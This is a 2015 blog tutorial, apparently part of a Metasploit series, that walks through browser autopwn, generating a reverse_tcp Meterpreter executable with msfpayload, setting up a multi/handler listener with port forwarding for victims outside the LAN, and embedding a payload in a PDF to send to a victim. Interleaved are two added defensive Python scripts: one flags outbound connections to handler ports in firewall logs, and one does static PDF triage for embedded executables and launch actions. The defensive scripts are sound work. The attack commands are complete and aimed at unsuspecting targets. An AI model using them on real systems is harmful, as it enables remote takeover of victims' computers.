INTRODUCTION TO METASPLOIT PART-7 >> BROWSER AUTOPWN & EXECUTABLE PAYLOAD - HACKING LIKE A PRO

Saturday 2 May 2015

We often do not know which browser the target is using, or whether Java is installed at all. That's when browser autopwn comes in handy: it runs a large number of browser-based exploits all at once, one after another, against whoever visits the page. That's why it is called autopwn.

This module is special: we do not have to set a payload, it chooses one for us.

So let's begin. In msfconsole, with the browser autopwn module selected, set the listen address and the URI path, then launch it:

set lhost 192.168.2.104
set uripath /
exploit


It will take some time to load, so be patient. Send http://192.168.2.104:8080/ to the victim; when the page is opened the autopwn process will begin and you will soon have your session.


We can also make an executable file and send it to the remote machine. When they run it, we get a meterpreter connection. This works like a RAT: we create an executable payload that carries our local IP and port, and when someone runs it, it connects back to us. Let's start!
In BackTrack, open a new console and type:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.104 LPORT=4444 X > /root/Desktop/server.exe

The command name is lower-case, since Linux is case-sensitive. Note that msfpayload has since been retired from Metasploit in favour of msfvenom, so on a current install you would use msfvenom instead.

This creates our server. When the target runs it, it will try to connect back to us, so we need to set up a listener that waits for incoming connections and accepts them.

Start the Metasploit console and type:

use exploit/multi/handler

Now let's add the payload:

set PAYLOAD windows/meterpreter/reverse_tcp

Set up our LHOST and LPORT. They must match the values baked into server.exe above, otherwise the connection never reaches the listener:

set LHOST 192.168.2.104
set LPORT 4444

Then type exploit. It will start listening for incoming connections, and when the target runs the file a meterpreter session will be created.

This can also be used outside the LAN. When creating your executable in BackTrack, use your external IP as LHOST. Forward LPORT on your router to your local IP, and when you set up the listener, set LHOST to your local IP, not the external one.

Some of you might still not know what port forwarding is, so let me explain. It forwards all incoming connections on a certain port to one machine in your local network. Why is it necessary? When a connection arrives from the WAN at your router, the router does not know which internal machine it is meant for. Forwarding the port tells it, so the connection reaches the listener and the session gets established. Read more here. If you still have no idea what I'm talking about, you should study networking before proceeding.
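From the defender's side, the property that matters in everything above is that the reverse_tcp connection is made outbound by the victim's machine, so an inbound firewall rule (or a router with no forwarding entry) never blocks it; only egress filtering and outbound connection logging see it. The following Python script is an added illustration, not part of the original post: it parses constructed firewall log lines (the src=/dst=/dport= format, the internal range 192.168.2.0/24 and the egress allowlist are all assumptions) and flags connections that go to the handler port used in the post, 4444, or that leave the internal network on a port outside the allowlist.

```python
"""Egress check for reverse-connection call-backs in firewall logs.

Added example, not part of the original post: the reverse_tcp payload
connects out from the victim to the listener, so only outbound connection
logs see it. The log format, the internal range 192.168.2.0/24 and the
allowlist below are assumptions; the sample lines are constructed.
"""
import ipaddress
import re

# The post's handler port (Metasploit's default LPORT); worth a rule of its own.
KNOWN_HANDLER_PORTS = {4444}
# Ports workstations are allowed to reach outside the LAN (assumed policy).
ALLOWED_EGRESS_PORTS = {53, 80, 443}
# Address space considered "inside" (assumption matching the post's LAN).
INTERNAL_NETS = [ipaddress.ip_network("192.168.2.0/24")]

LOG_RE = re.compile(
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>\S+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\S+)"
)

# Constructed firewall log lines (not real traffic).
SAMPLE_LOG = """\
2015-05-02T10:00:01 src=192.168.2.50 dst=203.0.113.10 proto=tcp dport=443 action=allow
2015-05-02T10:00:02 src=192.168.2.50 dst=203.0.113.10 proto=tcp dport=4444 action=allow
2015-05-02T10:00:03 src=192.168.2.50 dst=192.168.2.104 proto=tcp dport=4444 action=allow
2015-05-02T10:00:04 src=192.168.2.51 dst=198.51.100.7 proto=tcp dport=8443 action=allow
2015-05-02T10:00:05 src=192.168.2.51 dst=198.51.100.7 proto=tcp dport=8443 action=deny
2015-05-02T10:00:06 src=192.168.2.51 dst=8.8.8.8 proto=udp dport=53 action=allow
"""


def is_internal(ip):
    """True if the address falls inside one of the configured internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Return a dict of fields, or None for lines that do not match the format."""
    m = LOG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def classify(rec):
    """Name of the rule the record trips, or None if it looks normal."""
    if rec["action"] != "allow":
        return None                      # blocked, so no session could form
    if rec["proto"] == "tcp" and rec["dport"] in KNOWN_HANDLER_PORTS:
        return "known-handler-port"      # catches LAN and WAN listeners alike
    if (is_internal(rec["src"]) and not is_internal(rec["dst"])
            and rec["dport"] not in ALLOWED_EGRESS_PORTS):
        return "non-standard-egress"     # catches a listener on any other port
    return None


def find_suspicious(log_text):
    """(line number, rule, 'src -> dst:port') for every flagged record."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec)
        if rule:
            hits.append((n, rule, f"{rec['src']} -> {rec['dst']}:{rec['dport']}"))
    return hits


if __name__ == "__main__":
    for n, rule, desc in find_suspicious(SAMPLE_LOG):
        print(f"line {n}: {rule}: {desc}")
```

Running it flags lines 2, 3 and 4 of the sample and ignores the denied attempt on line 5. The allowlist rule is the more useful of the two, because it catches a listener on any non-allowlisted port rather than one known port; connections that do use allowlisted ports can only be distinguished by inspecting the traffic itself, which is why egress filtering is paired with proxying or TLS inspection in practice.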

We can inject our payload into formats other than .exe. Today we'll be using a PDF file-format exploit. It injects the payload into an existing PDF file; when the PDF is opened, the payload executes as a separate process, leaving the legitimate document intact.

Open a new console and type msfconsole to start Metasploit, then select the module:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Now let's show the options:

show options

It wants us to set INFILENAME, in other words the legitimate PDF document. Just go and download one.

set INFILENAME /root/Desktop/Sample.pdf

Set the payload to Meterpreter, set LHOST to your own machine's address (192.168.2.104 throughout this post) and run the exploit:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.104
exploit

Now we need to start a listener, so open a new console and type:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.104
exploit

Now send the newly generated PDF to the victim; when he opens it you'll get your meterpreter session.
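What the embedded-executable technique leaves behind in the document is something a defender can look for statically: an attached file object (/EmbeddedFile), an action that launches a program or attachment (/Launch), and an action that fires on open (/OpenAction). The script below is an added illustration, not part of the original post or of the Metasploit module: it counts those indicators in two constructed PDF files (a clean one, and one carrying an attached file whose stream starts with the PE "MZ" magic plus a launch action, both built inline) and returns a verdict. It only inspects uncompressed streams; real triage would also inflate /FlateDecode streams before checking them.

```python
"""Static triage of a PDF for embedded executables and launch actions.

Added example, not part of the original post or of the Metasploit module:
it scans raw PDF bytes for the object names that an attached executable and
an auto-launch need, and checks whether any uncompressed stream starts with
the Windows PE signature "MZ". Both sample documents are constructed here.
"""
import re

# PDF name objects worth counting in triage and what each one means.
INDICATORS = {
    "/EmbeddedFile": "a file is attached inside the document",
    "/Launch": "an action that runs a program or an attachment",
    "/OpenAction": "an action that fires as soon as the document opens",
    "/AA": "additional automatic actions (page open, mouse events, ...)",
    "/JavaScript": "JavaScript is present",
    "/JS": "JavaScript is present",
}

# A stream keyword that is not the tail of "endstream"; group 1 is the body.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)

# Constructed sample: an attached file whose stream starts with "MZ" plus a
# /Launch action wired up as the document's open action.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R /Names << /EmbeddedFiles << /Names [(payload.exe) 4 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /Type /Filespec /F (payload.exe) /EF << /F 6 0 R >> >> endobj
5 0 obj << /Type /Action /S /Launch /F (payload.exe) >> endobj
6 0 obj << /Type /EmbeddedFile /Length 4 >> stream
MZ\x90\x00
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: an ordinary one-page document with a content stream.
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj
4 0 obj << /Length 5 >> stream
BT ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def count_indicators(pdf_bytes):
    """Count each indicator name. The lookahead keeps /EmbeddedFile from
    matching /EmbeddedFiles and /JS from matching /JavaScript."""
    counts = {}
    for name in INDICATORS:
        pattern = re.escape(name).encode() + rb"(?![A-Za-z])"
        n = len(re.findall(pattern, pdf_bytes))
        if n:
            counts[name] = n
    return counts


def pe_streams(pdf_bytes):
    """Indexes of uncompressed streams whose body starts with the PE 'MZ' magic."""
    return [i for i, m in enumerate(STREAM_RE.finditer(pdf_bytes))
            if m.group(1).startswith(b"MZ")]


def assess(pdf_bytes):
    """Combine the indicators into a verdict a triage analyst can act on."""
    counts = count_indicators(pdf_bytes)
    exes = pe_streams(pdf_bytes)
    auto = "/OpenAction" in counts or "/AA" in counts
    suspicious = bool(
        "/Launch" in counts or exes or ("/EmbeddedFile" in counts and auto)
    )
    return {
        "indicators": counts,
        "pe_streams": exes,
        "verdict": "suspicious" if suspicious else "no static indicators",
    }


if __name__ == "__main__":
    for label, doc in (("suspicious sample", SUSPICIOUS_PDF), ("clean sample", CLEAN_PDF)):
        result = assess(doc)
        print(label, result["verdict"], result["indicators"], result["pe_streams"])
```

On the constructed samples the first document reports one each of /EmbeddedFile, /Launch and /OpenAction plus one MZ stream, and the clean one reports nothing. The same counts are what mail-gateway and sandbox PDF scanners key on, and the mitigation on the endpoint is the reader's own policy: current Adobe Reader versions prompt before a /Launch action runs and can be configured to refuse it outright.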
